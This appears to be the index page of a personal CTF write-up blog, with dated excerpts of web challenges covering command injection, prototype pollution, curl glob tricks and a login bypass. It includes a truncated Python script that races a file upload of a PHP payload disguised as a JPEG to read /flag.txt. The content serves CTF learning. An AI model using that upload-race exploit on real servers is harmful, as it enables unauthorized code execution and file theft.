Bing2

Type: #WEB #whitebox Difficulty: #easy SOLVED by: #myself TOOL USED: #burp TOPIC: #command_injection Writeup Date: 2024-07-27 URL = https://00b46582d765094ac90bb4db.deadsec.quest/bing.php The challenge description: the source code was provided through a link on Discord. First, let's see the website. I pressed CTRL-U to see the source code of the page; no functionality was found, so I looked at the source code provided, found Docker files and a fake flag to run the challenge locally, but the interesting thing we found was bing....

July 27, 2024

blade-runner

Type: #WEB #whitebox Difficulty: #easy SOLVED by: #myself TOOL USED: docker redis burpsuite TOPIC: prototype pollution Writeup Date: 2023-10-01 URL = https://ctf.maplebacon.org/instances The challenge description: we have the source code, so we can see what is happening in the backend, and we can run our own Docker container instead of trying to solve it within the 10-minute window before the instance shuts down. Unzip blade-runner.zip to extract the src. index.js imports some JS stuff and imports ....

October 1, 2023

hello

Type: #WEB #whitebox Difficulty: #easy SOLVED by: # TOOL USED: # TOPIC: # Writeup Date: 2023-09-22 URL = 45.147.231.180:8000 The challenge description: we need to read next.txt, but the file name is blocked and we cannot bypass it with some sort of case variation like fILe or anything like that. However, the x parameter is appended to curl, and curl has a unique feature if you look at the man page: you can use some sort of regex without adding a flag to curl http://45....

September 22, 2023

Philanthropy

Type: #WEB #blackbox Difficulty: #medium SOLVED by: #writeup TOOL USED: #burp #devtools Writeup Date: 2023-09-18 URL = http://web.csaw.io:14180/web/home I couldn't solve this challenge myself, so here are my attempts at solving it and the solution, and I will reference the writeup at the end. The challenge description: upon visiting the challenge URL we see login and register functionality. Hitting Ctrl+U to view the page source, we see a JS file that React....

September 18, 2023

official write-ups

https://github.com/ubcctf/maple-ctf-2023-public

September 10, 2023

one-for-all

Type: #WEB #blackbox Difficulty: #easy SOLVED by: #myself and biogenisis A writeup on how we aced first blood on the one-for-all challenge at PatriotCTF 2023. It was rated easy at first, but later PatriotCTF rated it hard, as you can see in the screenshot. The challenge: the first thing we see is a field asking us for a username. Like any fellow hacker, I typed the normal thing and hit the big button: "No such user exists" (keep that in mind)...

September 10, 2023

web writeups

colorful board first blood anotherslove mongodb objectid buntime ezstart

import requests
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
import warnings
import re

warnings.simplefilter('ignore')

URL = "https://cc435f7badc1e1fda35d576b.deadsec.quest/"
# URL = "http://localhost:1338/"
COUNT = 5

def upload():
    files = {'files': ('foobar.php', b"<?php readfile('/flag.txt') ?>", 'image/jpeg')}
    return requests.post(URL + "upload.php", files=files, verify=False)

def read(timestamp):
    return requests.get(URL + f"tmp/foobar_{timestamp}.php", verify=False)

diff = 0
while True:
    timestamp = int(datetime.now().timestamp()) - diff
    with ThreadPoolExecutor(max_workers=5) as executor:
        r1 = executor....

May 13, 2023

INTRODUCTION

OFFICIAL WRITEUP [[Philanthropy]] https://github.com/AustinStitz-Hacking/csaw23qual

WaniCTF 2023

Contains posts related to WaniCTF

September 22, 2023

HackingIo 2023

Contains posts related to HackingIo

September 21, 2023